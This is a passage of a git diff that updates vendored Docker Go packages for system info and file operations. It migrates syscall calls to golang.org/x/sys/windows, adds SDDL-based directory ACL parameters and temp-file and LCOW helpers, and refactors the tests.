"test-sysinfo-proc") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(tmpDir) procFile := filepath.Join(tmpDir, "read-proc-bool") - if err := ioutil.WriteFile(procFile, []byte("1"), 644); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(procFile, []byte("1"), 0644) + assert.NilError(t, err) if !readProcBool(procFile) { t.Fatal("expected proc bool to be true, got false") } - if err := ioutil.WriteFile(procFile, []byte("0"), 644); err != nil { + if err := ioutil.WriteFile(procFile, []byte("0"), 0644); err != nil { t.Fatal(err) } if readProcBool(procFile) { - t.Fatal("expected proc bool to be false, got false") + t.Fatal("expected proc bool to be false, got true") } if readProcBool(path.Join(tmpDir, "no-exist")) { @@ -39,20 +39,66 @@ func TestReadProcBool(t *testing.T) { func TestCgroupEnabled(t *testing.T) { cgroupDir, err := ioutil.TempDir("", "cgroup-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(cgroupDir) if cgroupEnabled(cgroupDir, "test") { t.Fatal("cgroupEnabled should be false") } - if err := ioutil.WriteFile(path.Join(cgroupDir, "test"), []byte{}, 644); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(path.Join(cgroupDir, "test"), []byte{}, 0644) + assert.NilError(t, err) if !cgroupEnabled(cgroupDir, "test") { t.Fatal("cgroupEnabled should be true") } } + +func TestNew(t *testing.T) { + sysInfo := New(false) + assert.Assert(t, sysInfo != nil) + checkSysInfo(t, sysInfo) + + sysInfo = New(true) + assert.Assert(t, sysInfo != nil) + checkSysInfo(t, sysInfo) +} + +func checkSysInfo(t *testing.T, sysInfo *SysInfo) { + // Check if Seccomp is supported, via CONFIG_SECCOMP.then sysInfo.Seccomp must be TRUE , else FALSE + if err := unix.Prctl(unix.PR_GET_SECCOMP, 0, 0, 0, 0); err != unix.EINVAL { + // Make sure the kernel has CONFIG_SECCOMP_FILTER. + if err := unix.Prctl(unix.PR_SET_SECCOMP, unix.SECCOMP_MODE_FILTER, 0, 0, 0); err != unix.EINVAL { + assert.Assert(t, sysInfo.Seccomp) + } + } else { + assert.Assert(t, !sysInfo.Seccomp) + } +} + +func TestNewAppArmorEnabled(t *testing.T) { + // Check if AppArmor is supported. then it must be TRUE , else FALSE + if _, err := os.Stat("/sys/kernel/security/apparmor"); err != nil { + t.Skip("App Armor Must be Enabled") + } + + sysInfo := New(true) + assert.Assert(t, sysInfo.AppArmor) +} + +func TestNewAppArmorDisabled(t *testing.T) { + // Check if AppArmor is supported. then it must be TRUE , else FALSE + if _, err := os.Stat("/sys/kernel/security/apparmor"); !os.IsNotExist(err) { + t.Skip("App Armor Must be Disabled") + } + + sysInfo := New(true) + assert.Assert(t, !sysInfo.AppArmor) +} + +func TestNumCPU(t *testing.T) { + cpuNumbers := NumCPU() + if cpuNumbers <= 0 { + t.Fatal("CPU returned must be greater than zero") + } +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go deleted file mode 100644 index c858d57e08..0000000000 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go +++ /dev/null @@ -1,121 +0,0 @@ -// +build solaris,cgo - -package sysinfo - -import ( - "bytes" - "os/exec" - "strconv" - "strings" -) - -/* -#cgo LDFLAGS: -llgrp -#include -#include -#include -int getLgrpCount() { - lgrp_cookie_t lgrpcookie = LGRP_COOKIE_NONE; - uint_t nlgrps; - - if ((lgrpcookie = lgrp_init(LGRP_VIEW_OS)) == LGRP_COOKIE_NONE) { - return -1; - } - nlgrps = lgrp_nlgrps(lgrpcookie); - return nlgrps; -} -*/ -import "C" - -// IsCPUSharesAvailable returns whether CPUShares setting is supported. -// We need FSS to be set as default scheduling class to support CPU Shares -func IsCPUSharesAvailable() bool { - cmd := exec.Command("/usr/sbin/dispadmin", "-d") - outBuf := new(bytes.Buffer) - errBuf := new(bytes.Buffer) - cmd.Stderr = errBuf - cmd.Stdout = outBuf - - if err := cmd.Run(); err != nil { - return false - } - return (strings.Contains(outBuf.String(), "FSS")) -} - -// New returns a new SysInfo, using the filesystem to detect which features -// the kernel supports. -//NOTE Solaris: If we change the below capabilities be sure -// to update verifyPlatformContainerSettings() in daemon_solaris.go -func New(quiet bool) *SysInfo { - sysInfo := &SysInfo{} - sysInfo.cgroupMemInfo = setCgroupMem(quiet) - sysInfo.cgroupCPUInfo = setCgroupCPU(quiet) - sysInfo.cgroupBlkioInfo = setCgroupBlkioInfo(quiet) - sysInfo.cgroupCpusetInfo = setCgroupCPUsetInfo(quiet) - - sysInfo.IPv4ForwardingDisabled = false - - sysInfo.AppArmor = false - - return sysInfo -} - -// setCgroupMem reads the memory information for Solaris. -func setCgroupMem(quiet bool) cgroupMemInfo { - - return cgroupMemInfo{ - MemoryLimit: true, - SwapLimit: true, - MemoryReservation: false, - OomKillDisable: false, - MemorySwappiness: false, - KernelMemory: false, - } -} - -// setCgroupCPU reads the cpu information for Solaris. -func setCgroupCPU(quiet bool) cgroupCPUInfo { - - return cgroupCPUInfo{ - CPUShares: true, - CPUCfsPeriod: false, - CPUCfsQuota: true, - CPURealtimePeriod: false, - CPURealtimeRuntime: false, - } -} - -// blkio switches are not supported in Solaris. -func setCgroupBlkioInfo(quiet bool) cgroupBlkioInfo { - - return cgroupBlkioInfo{ - BlkioWeight: false, - BlkioWeightDevice: false, - } -} - -// setCgroupCPUsetInfo reads the cpuset information for Solaris. -func setCgroupCPUsetInfo(quiet bool) cgroupCpusetInfo { - - return cgroupCpusetInfo{ - Cpuset: true, - Cpus: getCPUCount(), - Mems: getLgrpCount(), - } -} - -func getCPUCount() string { - ncpus := C.sysconf(C._SC_NPROCESSORS_ONLN) - if ncpus <= 0 { - return "" - } - return strconv.FormatInt(int64(ncpus), 16) -} - -func getLgrpCount() string { - nlgrps := C.getLgrpCount() - if nlgrps <= 0 { - return "" - } - return strconv.FormatInt(int64(nlgrps), 16) -} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go index b61fbcf541..6a118b63c8 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go @@ -1,4 +1,4 @@ -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import "testing" diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go index 45f3ef1c65..23cc695fb8 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go @@ -1,8 +1,8 @@ -// +build !linux,!solaris,!windows +// +build !linux,!windows -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" -// New returns an empty SysInfo for non linux nor solaris for now. +// New returns an empty SysInfo for non linux for now. func New(quiet bool) *SysInfo { sysInfo := &SysInfo{} return sysInfo diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go index 4e6255bc59..5f68524e7e 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" // New returns an empty SysInfo for windows for now. func New(quiet bool) *SysInfo { diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes.go b/vendor/github.com/docker/docker/pkg/system/chtimes.go index 7637f12e1a..c26a4e24b6 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes.go @@ -1,27 +1,10 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" - "syscall" "time" - "unsafe" ) -var ( - maxTime time.Time -) - -func init() { - if unsafe.Sizeof(syscall.Timespec{}.Nsec) == 8 { - // This is a 64 bit timespec - // os.Chtimes limits time to the following - maxTime = time.Unix(0, 1<<63-1) - } else { - // This is a 32 bit timespec - maxTime = time.Unix(1<<31-1, 0) - } -} - // Chtimes changes the access time and modified time of a file at the given path func Chtimes(name string, atime time.Time, mtime time.Time) error { unixMinTime := time.Unix(0, 0) @@ -44,9 +27,5 @@ func Chtimes(name string, atime time.Time, mtime time.Time) error { } // Take platform specific action for setting create time. - if err := setCTime(name, mtime); err != nil { - return err - } - - return nil + return setCTime(name, mtime) } diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go index 5c87df32a2..5a3f98e199 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_test.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go index 09d58bcbfd..259138a45b 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go @@ -1,6 +1,6 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "time" diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go index 6ec9a7173c..e25232c767 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go index 2945868465..d3a115ff42 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go @@ -1,27 +1,26 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" import ( - "syscall" "time" + + "golang.org/x/sys/windows" ) //setCTime will set the create time on a file. On Windows, this requires //calling SetFileTime and explicitly including the create time. func setCTime(path string, ctime time.Time) error { - ctimespec := syscall.NsecToTimespec(ctime.UnixNano()) - pathp, e := syscall.UTF16PtrFromString(path) + ctimespec := windows.NsecToTimespec(ctime.UnixNano()) + pathp, e := windows.UTF16PtrFromString(path) if e != nil { return e } - h, e := syscall.CreateFile(pathp, - syscall.FILE_WRITE_ATTRIBUTES, syscall.FILE_SHARE_WRITE, nil, - syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0) + h, e := windows.CreateFile(pathp, + windows.FILE_WRITE_ATTRIBUTES, windows.FILE_SHARE_WRITE, nil, + windows.OPEN_EXISTING, windows.FILE_FLAG_BACKUP_SEMANTICS, 0) if e != nil { return e } - defer syscall.Close(h) - c := syscall.NsecToFiletime(syscall.TimespecToNsec(ctimespec)) - return syscall.SetFileTime(h, &c, nil, nil) + defer windows.Close(h) + c := windows.NsecToFiletime(windows.TimespecToNsec(ctimespec)) + return windows.SetFileTime(h, &c, nil, nil) } diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go index 72d8a10619..d91e4bc6e4 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go @@ -1,6 +1,6 @@ // +build windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/system/errors.go b/vendor/github.com/docker/docker/pkg/system/errors.go index 288318985e..2573d71622 100644 --- a/vendor/github.com/docker/docker/pkg/system/errors.go +++ b/vendor/github.com/docker/docker/pkg/system/errors.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "errors" @@ -7,4 +7,7 @@ import ( var ( // ErrNotSupportedPlatform means the platform is not supported. ErrNotSupportedPlatform = errors.New("platform and architecture is not supported") + + // ErrNotSupportedOperatingSystem means the operating system is not supported. + ErrNotSupportedOperatingSystem = errors.New("operating system is not supported") ) diff --git a/vendor/github.com/docker/docker/pkg/system/events_windows.go b/vendor/github.com/docker/docker/pkg/system/events_windows.go deleted file mode 100644 index 3ec6d22151..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/events_windows.go +++ /dev/null @@ -1,85 +0,0 @@ -package system - -// This file implements syscalls for Win32 events which are not implemented -// in golang. - -import ( - "syscall" - "unsafe" - - "golang.org/x/sys/windows" -) - -var ( - procCreateEvent = modkernel32.NewProc("CreateEventW") - procOpenEvent = modkernel32.NewProc("OpenEventW") - procSetEvent = modkernel32.NewProc("SetEvent") - procResetEvent = modkernel32.NewProc("ResetEvent") - procPulseEvent = modkernel32.NewProc("PulseEvent") -) - -// CreateEvent implements win32 CreateEventW func in golang. It will create an event object. -func CreateEvent(eventAttributes *syscall.SecurityAttributes, manualReset bool, initialState bool, name string) (handle syscall.Handle, err error) { - namep, _ := syscall.UTF16PtrFromString(name) - var _p1 uint32 - if manualReset { - _p1 = 1 - } - var _p2 uint32 - if initialState { - _p2 = 1 - } - r0, _, e1 := procCreateEvent.Call(uintptr(unsafe.Pointer(eventAttributes)), uintptr(_p1), uintptr(_p2), uintptr(unsafe.Pointer(namep))) - use(unsafe.Pointer(namep)) - handle = syscall.Handle(r0) - if handle == syscall.InvalidHandle { - err = e1 - } - return -} - -// OpenEvent implements win32 OpenEventW func in golang. It opens an event object. -func OpenEvent(desiredAccess uint32, inheritHandle bool, name string) (handle syscall.Handle, err error) { - namep, _ := syscall.UTF16PtrFromString(name) - var _p1 uint32 - if inheritHandle { - _p1 = 1 - } - r0, _, e1 := procOpenEvent.Call(uintptr(desiredAccess), uintptr(_p1), uintptr(unsafe.Pointer(namep))) - use(unsafe.Pointer(namep)) - handle = syscall.Handle(r0) - if handle == syscall.InvalidHandle { - err = e1 - } - return -} - -// SetEvent implements win32 SetEvent func in golang. -func SetEvent(handle syscall.Handle) (err error) { - return setResetPulse(handle, procSetEvent) -} - -// ResetEvent implements win32 ResetEvent func in golang. -func ResetEvent(handle syscall.Handle) (err error) { - return setResetPulse(handle, procResetEvent) -} - -// PulseEvent implements win32 PulseEvent func in golang. -func PulseEvent(handle syscall.Handle) (err error) { - return setResetPulse(handle, procPulseEvent) -} - -func setResetPulse(handle syscall.Handle, proc *windows.LazyProc) (err error) { - r0, _, _ := proc.Call(uintptr(handle)) - if r0 != 0 { - err = syscall.Errno(r0) - } - return -} - -var temp unsafe.Pointer - -// use ensures a variable is kept alive without the GC freeing while still needed -func use(p unsafe.Pointer) { - temp = p -} diff --git a/vendor/github.com/docker/docker/pkg/system/exitcode.go b/vendor/github.com/docker/docker/pkg/system/exitcode.go index 60f0514b1d..4ba8fe35bf 100644 --- a/vendor/github.com/docker/docker/pkg/system/exitcode.go +++ b/vendor/github.com/docker/docker/pkg/system/exitcode.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "fmt" @@ -17,17 +17,3 @@ func GetExitCode(err error) (int, error) { } return exitCode, fmt.Errorf("failed to get exit code") } - -// ProcessExitCode process the specified error and returns the exit status code -// if the error was of type exec.ExitError, returns nothing otherwise. -func ProcessExitCode(err error) (exitCode int) { - if err != nil { - var exiterr error - if exitCode, exiterr = GetExitCode(err); exiterr != nil { - // TODO: Fix this so we check the error's text. - // we've failed to retrieve exit code, so we set it to 127 - exitCode = 127 - } - } - return -} diff --git a/vendor/github.com/docker/docker/pkg/system/filesys.go b/vendor/github.com/docker/docker/pkg/system/filesys.go index 810c794786..adeb163052 100644 --- a/vendor/github.com/docker/docker/pkg/system/filesys.go +++ b/vendor/github.com/docker/docker/pkg/system/filesys.go @@ -1,21 +1,21 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( + "io/ioutil" "os" "path/filepath" ) -// MkdirAllWithACL is a wrapper for MkdirAll that creates a directory -// ACL'd for Builtin Administrators and Local System. -func MkdirAllWithACL(path string, perm os.FileMode) error { - return MkdirAll(path, perm) +// MkdirAllWithACL is a wrapper for MkdirAll on unix systems. +func MkdirAllWithACL(path string, perm os.FileMode, sddl string) error { + return MkdirAll(path, perm, sddl) } // MkdirAll creates a directory named path along with any necessary parents, // with permission specified by attribute perm for all dir created. -func MkdirAll(path string, perm os.FileMode) error { +func MkdirAll(path string, perm os.FileMode, sddl string) error { return os.MkdirAll(path, perm) } @@ -24,7 +24,7 @@ func IsAbs(path string) bool { return filepath.IsAbs(path) } -// The functions below here are wrappers for the equivalents in the os package. +// The functions below here are wrappers for the equivalents in the os and ioutils packages. // They are passthrough on Unix platforms, and only relevant on Windows. // CreateSequential creates the named file with mode 0666 (before umask), truncating @@ -52,3 +52,16 @@ func OpenSequential(name string) (*os.File, error) { func OpenFileSequential(name string, flag int, perm os.FileMode) (*os.File, error) { return os.OpenFile(name, flag, perm) } + +// TempFileSequential creates a new temporary file in the directory dir +// with a name beginning with prefix, opens the file for reading +// and writing, and returns the resulting *os.File. +// If dir is the empty string, TempFile uses the default directory +// for temporary files (see os.TempDir). +// Multiple programs calling TempFile simultaneously +// will not choose the same file. The caller can use f.Name() +// to find the pathname of the file. It is the caller's responsibility +// to remove the file when no longer needed. +func TempFileSequential(dir, prefix string) (f *os.File, err error) { + return ioutil.TempFile(dir, prefix) +} diff --git a/vendor/github.com/docker/docker/pkg/system/filesys_windows.go b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go index 6094f01fd4..a1f6013f13 100644 --- a/vendor/github.com/docker/docker/pkg/system/filesys_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go @@ -1,33 +1,42 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" "path/filepath" "regexp" + "strconv" "strings" + "sync" "syscall" + "time" "unsafe" winio "github.com/Microsoft/go-winio" + "golang.org/x/sys/windows" +) + +const ( + // SddlAdministratorsLocalSystem is local administrators plus NT AUTHORITY\System + SddlAdministratorsLocalSystem = "D:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)" + // SddlNtvmAdministratorsLocalSystem is NT VIRTUAL MACHINE\Virtual Machines plus local administrators plus NT AUTHORITY\System + SddlNtvmAdministratorsLocalSystem = "D:P(A;OICI;GA;;;S-1-5-83-0)(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)" ) // MkdirAllWithACL is a wrapper for MkdirAll that creates a directory -// ACL'd for Builtin Administrators and Local System. -func MkdirAllWithACL(path string, perm os.FileMode) error { - return mkdirall(path, true) +// with an appropriate SDDL defined ACL. +func MkdirAllWithACL(path string, perm os.FileMode, sddl string) error { + return mkdirall(path, true, sddl) } // MkdirAll implementation that is volume path aware for Windows. -func MkdirAll(path string, _ os.FileMode) error { - return mkdirall(path, false) +func MkdirAll(path string, _ os.FileMode, sddl string) error { + return mkdirall(path, false, sddl) } // mkdirall is a custom version of os.MkdirAll modified for use on Windows // so that it is both volume path aware, and can create a directory with // a DACL. -func mkdirall(path string, adminAndLocalSystem bool) error { +func mkdirall(path string, applyACL bool, sddl string) error { if re := regexp.MustCompile(`^\\\\\?\\Volume{[a-z0-9-]+}$`); re.MatchString(path) { return nil } @@ -61,15 +70,15 @@ func mkdirall(path string, adminAndLocalSystem bool) error { if j > 1 { // Create parent - err = mkdirall(path[0:j-1], false) + err = mkdirall(path[0:j-1], false, sddl) if err != nil { return err } } // Parent now exists; invoke os.Mkdir or mkdirWithACL and use its result. - if adminAndLocalSystem { - err = mkdirWithACL(path) + if applyACL { + err = mkdirWithACL(path, sddl) } else { err = os.Mkdir(path, 0) } @@ -89,13 +98,12 @@ func mkdirall(path string, adminAndLocalSystem bool) error { // mkdirWithACL creates a new directory. If there is an error, it will be of // type *PathError. . // -// This is a modified and combined version of os.Mkdir and syscall.Mkdir +// This is a modified and combined version of os.Mkdir and windows.Mkdir // in golang to cater for creating a directory am ACL permitting full // access, with inheritance, to any subfolder/file for Built-in Administrators // and Local System. -func mkdirWithACL(name string) error { - sa := syscall.SecurityAttributes{Length: 0} - sddl := "D:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)" +func mkdirWithACL(name string, sddl string) error { + sa := windows.SecurityAttributes{Length: 0} sd, err := winio.SddlToSecurityDescriptor(sddl) if err != nil { return &os.PathError{Op: "mkdir", Path: name, Err: err} @@ -104,12 +112,12 @@ func mkdirWithACL(name string) error { sa.InheritHandle = 1 sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0])) - namep, err := syscall.UTF16PtrFromString(name) + namep, err := windows.UTF16PtrFromString(name) if err != nil { return &os.PathError{Op: "mkdir", Path: name, Err: err} } - e := syscall.CreateDirectory(namep, &sa) + e := windows.CreateDirectory(namep, &sa) if e != nil { return &os.PathError{Op: "mkdir", Path: name, Err: e} } @@ -132,7 +140,7 @@ func IsAbs(path string) bool { return true } -// The origin of the functions below here are the golang OS and syscall packages, +// The origin of the functions below here are the golang OS and windows packages, // slightly modified to only cope with files, not directories due to the // specific use case. // @@ -164,73 +172,125 @@ func OpenFileSequential(name string, flag int, _ os.FileMode) (*os.File, error) if name == "" { return nil, &os.PathError{Op: "open", Path: name, Err: syscall.ENOENT} } - r, errf := syscallOpenFileSequential(name, flag, 0) + r, errf := windowsOpenFileSequential(name, flag, 0) if errf == nil { return r, nil } return nil, &os.PathError{Op: "open", Path: name, Err: errf} } -func syscallOpenFileSequential(name string, flag int, _ os.FileMode) (file *os.File, err error) { - r, e := syscallOpenSequential(name, flag|syscall.O_CLOEXEC, 0) +func windowsOpenFileSequential(name string, flag int, _ os.FileMode) (file *os.File, err error) { + r, e := windowsOpenSequential(name, flag|windows.O_CLOEXEC, 0) if e != nil { return nil, e } return os.NewFile(uintptr(r), name), nil } -func makeInheritSa() *syscall.SecurityAttributes { - var sa syscall.SecurityAttributes +func makeInheritSa() *windows.SecurityAttributes { + var sa windows.SecurityAttributes sa.Length = uint32(unsafe.Sizeof(sa)) sa.InheritHandle = 1 return &sa } -func syscallOpenSequential(path string, mode int, _ uint32) (fd syscall.Handle, err error) { +func windowsOpenSequential(path string, mode int, _ uint32) (fd windows.Handle, err error) { if len(path) == 0 { - return syscall.InvalidHandle, syscall.ERROR_FILE_NOT_FOUND + return windows.InvalidHandle, windows.ERROR_FILE_NOT_FOUND } - pathp, err := syscall.UTF16PtrFromString(path) + pathp, err := windows.UTF16PtrFromString(path) if err != nil { - return syscall.InvalidHandle, err + return windows.InvalidHandle, err } var access uint32 - switch mode & (syscall.O_RDONLY | syscall.O_WRONLY | syscall.O_RDWR) { - case syscall.O_RDONLY: - access = syscall.GENERIC_READ - case syscall.O_WRONLY: - access = syscall.GENERIC_WRITE - case syscall.O_RDWR: - access = syscall.GENERIC_READ | syscall.GENERIC_WRITE - } - if mode&syscall.O_CREAT != 0 { - access |= syscall.GENERIC_WRITE - } - if mode&syscall.O_APPEND != 0 { - access &^= syscall.GENERIC_WRITE - access |= syscall.FILE_APPEND_DATA - } - sharemode := uint32(syscall.FILE_SHARE_READ | syscall.FILE_SHARE_WRITE) - var sa *syscall.SecurityAttributes - if mode&syscall.O_CLOEXEC == 0 { + switch mode & (windows.O_RDONLY | windows.O_WRONLY | windows.O_RDWR) { + case windows.O_RDONLY: + access = windows.GENERIC_READ + case windows.O_WRONLY: + access = windows.GENERIC_WRITE + case windows.O_RDWR: + access = windows.GENERIC_READ | windows.GENERIC_WRITE + } + if mode&windows.O_CREAT != 0 { + access |= windows.GENERIC_WRITE + } + if mode&windows.O_APPEND != 0 { + access &^= windows.GENERIC_WRITE + access |= windows.FILE_APPEND_DATA + } + sharemode := uint32(windows.FILE_SHARE_READ | windows.FILE_SHARE_WRITE) + var sa *windows.SecurityAttributes + if mode&windows.O_CLOEXEC == 0 { sa = makeInheritSa() } var createmode uint32 switch { - case mode&(syscall.O_CREAT|syscall.O_EXCL) == (syscall.O_CREAT | syscall.O_EXCL): - createmode = syscall.CREATE_NEW - case mode&(syscall.O_CREAT|syscall.O_TRUNC) == (syscall.O_CREAT | syscall.O_TRUNC): - createmode = syscall.CREATE_ALWAYS - case mode&syscall.O_CREAT == syscall.O_CREAT: - createmode = syscall.OPEN_ALWAYS - case mode&syscall.O_TRUNC == syscall.O_TRUNC: - createmode = syscall.TRUNCATE_EXISTING + case mode&(windows.O_CREAT|windows.O_EXCL) == (windows.O_CREAT | windows.O_EXCL): + createmode = windows.CREATE_NEW + case mode&(windows.O_CREAT|windows.O_TRUNC) == (windows.O_CREAT | windows.O_TRUNC): + createmode = windows.CREATE_ALWAYS + case mode&windows.O_CREAT == windows.O_CREAT: + createmode = windows.OPEN_ALWAYS + case mode&windows.O_TRUNC == windows.O_TRUNC: + createmode = windows.TRUNCATE_EXISTING default: - createmode = syscall.OPEN_EXISTING + createmode = windows.OPEN_EXISTING } // Use FILE_FLAG_SEQUENTIAL_SCAN rather than FILE_ATTRIBUTE_NORMAL as implemented in golang. //https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN - h, e := syscall.CreateFile(pathp, access, sharemode, sa, createmode, fileFlagSequentialScan, 0) + h, e := windows.CreateFile(pathp, access, sharemode, sa, createmode, fileFlagSequentialScan, 0) return h, e } + +// Helpers for TempFileSequential +var rand uint32 +var randmu sync.Mutex + +func reseed() uint32 { + return uint32(time.Now().UnixNano() + int64(os.Getpid())) +} +func nextSuffix() string { + randmu.Lock() + r := rand + if r == 0 { + r = reseed() + } + r = r*1664525 + 1013904223 // constants from Numerical Recipes + rand = r + randmu.Unlock() + return strconv.Itoa(int(1e9 + r%1e9))[1:] +} + +// TempFileSequential is a copy of ioutil.TempFile, modified to use sequential +// file access. Below is the original comment from golang: +// TempFile creates a new temporary file in the directory dir +// with a name beginning with prefix, opens the file for reading +// and writing, and returns the resulting *os.File. +// If dir is the empty string, TempFile uses the default directory +// for temporary files (see os.TempDir). +// Multiple programs calling TempFile simultaneously +// will not choose the same file. The caller can use f.Name() +// to find the pathname of the file. It is the caller's responsibility +// to remove the file when no longer needed. +func TempFileSequential(dir, prefix string) (f *os.File, err error) { + if dir == "" { + dir = os.TempDir() + } + + nconflict := 0 + for i := 0; i < 10000; i++ { + name := filepath.Join(dir, prefix+nextSuffix()) + f, err = OpenFileSequential(name, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600) + if os.IsExist(err) { + if nconflict++; nconflict > 10 { + randmu.Lock() + rand = reseed() + randmu.Unlock() + } + continue + } + break + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/system/init.go b/vendor/github.com/docker/docker/pkg/system/init.go new file mode 100644 index 0000000000..a17597aaba --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/init.go @@ -0,0 +1,22 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "syscall" + "time" + "unsafe" +) + +// Used by chtimes +var maxTime time.Time + +func init() { + // chtimes initialization + if unsafe.Sizeof(syscall.Timespec{}.Nsec) == 8 { + // This is a 64 bit timespec + // os.Chtimes limits time to the following + maxTime = time.Unix(0, 1<<63-1) + } else { + // This is a 32 bit timespec + maxTime = time.Unix(1<<31-1, 0) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/init_unix.go b/vendor/github.com/docker/docker/pkg/system/init_unix.go new file mode 100644 index 0000000000..4996a67c12 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/init_unix.go @@ -0,0 +1,7 @@ +// +build !windows + +package system // import "github.com/docker/docker/pkg/system" + +// InitLCOW does nothing since LCOW is a windows only feature +func InitLCOW(experimental bool) { +} diff --git a/vendor/github.com/docker/docker/pkg/system/init_windows.go b/vendor/github.com/docker/docker/pkg/system/init_windows.go new file mode 100644 index 0000000000..4910ff69d6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/init_windows.go @@ -0,0 +1,12 @@ +package system // import "github.com/docker/docker/pkg/system" + +// lcowSupported determines if Linux Containers on Windows are supported. +var lcowSupported = false + +// InitLCOW sets whether LCOW is supported or not +func InitLCOW(experimental bool) { + v := GetOSVersion() + if experimental && v.Build >= 16299 { + lcowSupported = true + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/lcow.go b/vendor/github.com/docker/docker/pkg/system/lcow.go new file mode 100644 index 0000000000..5c3fbfe6f4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lcow.go @@ -0,0 +1,69 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "fmt" + "runtime" + "strings" + + specs "github.com/opencontainers/image-spec/specs-go/v1" +) + +// ValidatePlatform determines if a platform structure is valid. +// TODO This is a temporary function - can be replaced by parsing from +// https://github.com/containerd/containerd/pull/1403/files at a later date. +// @jhowardmsft +func ValidatePlatform(platform *specs.Platform) error { + platform.Architecture = strings.ToLower(platform.Architecture) + platform.OS = strings.ToLower(platform.OS) + // Based on https://github.com/moby/moby/pull/34642#issuecomment-330375350, do + // not support anything except operating system. + if platform.Architecture != "" { + return fmt.Errorf("invalid platform architecture %q", platform.Architecture) + } + if platform.OS != "" { + if !(platform.OS == runtime.GOOS || (LCOWSupported() && platform.OS == "linux")) { + return fmt.Errorf("invalid platform os %q", platform.OS) + } + } + if len(platform.OSFeatures) != 0 { + return fmt.Errorf("invalid platform osfeatures %q", platform.OSFeatures) + } + if 